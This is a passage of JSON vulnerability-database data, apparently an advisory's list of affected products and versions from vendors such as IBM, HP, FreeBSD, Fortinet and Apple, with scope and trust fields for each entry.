0.3, "vendor": "freebsd", "version": null }, { "model": "smb1920 (comware r1112", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.12.0" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "openstage desk phone ip si r3.32", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v3" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "u200s and cs (comware f5123p33", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "10.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "57007)" }, { "model": "fortivoiceos", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.9" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "msr4000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "hp6000 (comware r2507p44", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0" }, { "model": "(comware r1118p13", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58305)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "netezza diagnostics tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.1" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.2" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.6.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "intelligent management center", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "rse ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.3" }, { "model": "rpe ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.6.0.3" }, { "model": "(comware r5213p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3100v25)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.6.0.3" }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "mq light client module for node.js 1.0.2014091000-red", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.6.0.4" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.19" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.5" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.8" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "netezza platform software 7.1.0.5-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "qradar incident forensics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "flex system fc3171 8gb san switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.3" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "(comware r7377", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125007)" }, { "model": "websphere mq for hp nonstop server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.10" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.5" }, { "model": "security network controller 1.0.3394m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1.1" }, { "model": "comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "50" }, { "model": "system networking rackswitch g8124-e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.37" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc4-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.12" }, { "model": "imc plat e0403p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "flashsystem 9843-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.2" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.16.00" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3.633" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "openscape branch r", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "virtual fabric 10gb switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.8.23.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "10.2-beta2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0" }, { "model": "(comware r1517p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v19105)" }, { "model": "hp830 (comware r3507p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.11" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "505)" }, { "model": "hsr6800 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "puredata system for analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.13" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.2" }, { "model": "forticlient ios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "system networking rackswitch g8264t", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "10.2-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.41" }, { "model": "forticlient android", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.3" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "si4093 image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.17" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "u200a and m (comware f5123p33", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "openscape desk phone ip si r3.32", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ctpview 7.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "hsr6602 ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "ctpview 7.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "(comware r1210p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105005)" }, { "model": "system networking rackswitch g8332", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.7.22.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.3" }, { "model": "openscape voice r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.6.0.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "fortianalyzer", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "nj5000 r1107", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hsr6600 (comware r7103p09", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "hsr6800 ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "tivoli netcool reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "(comware r1829p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125005)" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.1" }, { "model": "netezza platform software 7.2.0.7-p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "insight control", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.62" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "server migration pack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "10.2-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "msr20-1x (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr3000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.53" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9500e (comware r1829p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "fortidb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "5130hi (comware r1120", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "5500si (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "flashsystem 9848-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "server migration pack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.6.0.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "openscape branch r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35001.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": 